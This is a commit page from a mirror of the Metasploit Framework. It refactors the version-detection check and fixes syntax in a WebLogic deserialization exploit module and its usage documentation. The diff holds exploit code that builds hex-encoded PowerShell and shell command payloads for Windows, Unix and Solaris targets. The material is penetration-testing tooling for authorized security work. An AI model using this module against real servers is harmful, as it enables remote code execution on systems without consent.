infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Some improvements in code and documentation.

master
Andres Rodriguez 2018-12-15 20:42:17 -08:00
parent 29c70b8585
commit 873d048b89
2 changed files with 20 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
documentation/modules/exploit/multi/misc/weblogic_deserialize_marshalledobject.md
View File

@ -7,7 +7,7 @@
2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject` 2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
3. `set rhosts <rhost>` 3. `set rhosts <rhost>`
4. `set rport <srvport>` 4. `set rport <srvport>`
6. `exploit` 5. `exploit`
## Scenarios ## Scenarios
### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80 ### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
``` ```

37
modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
View File

@ -84,26 +84,27 @@ class MetasploitModule < Msf::Exploit::Remote
disconnect disconnect
return CheckCode::Unknown unless res return CheckCode::Unknown unless res
/WebLogic Server Version: (?<version>\d+\.\d+\.\d*\.*\d*)/ =~ res unless res.include?('Oracle WebLogic Server Administration Console')
if version return CheckCode::Safe
version = Gem::Version.new(version)
print_status("Detected Oracle WebLogic Server Version: #{version.to_s}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
end end
if res.include?('Oracle WebLogic Server Administration Console') /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
return CheckCode::Detected unless version
return CheckCode::Safe
end end
CheckCode::Unknown version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
return CheckCode::Safe
end end
def t3_handshake def t3_handshake
@ -179,11 +180,11 @@ class MetasploitModule < Msf::Exploit::Remote
if target.name == 'Windows' if target.name == 'Windows'
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
elseif target.name == 'Unix' elsif target.name == 'Unix'
nix_cmd = payload.encoded nix_cmd = payload.encoded
nix_cmd.prepend('/bin/sh -c ') nix_cmd.prepend('/bin/sh -c ')
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
elseif target.name == 'Solaris' elsif target.name == 'Solaris'
sol_cmd = payload.encoded sol_cmd = payload.encoded
mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
end end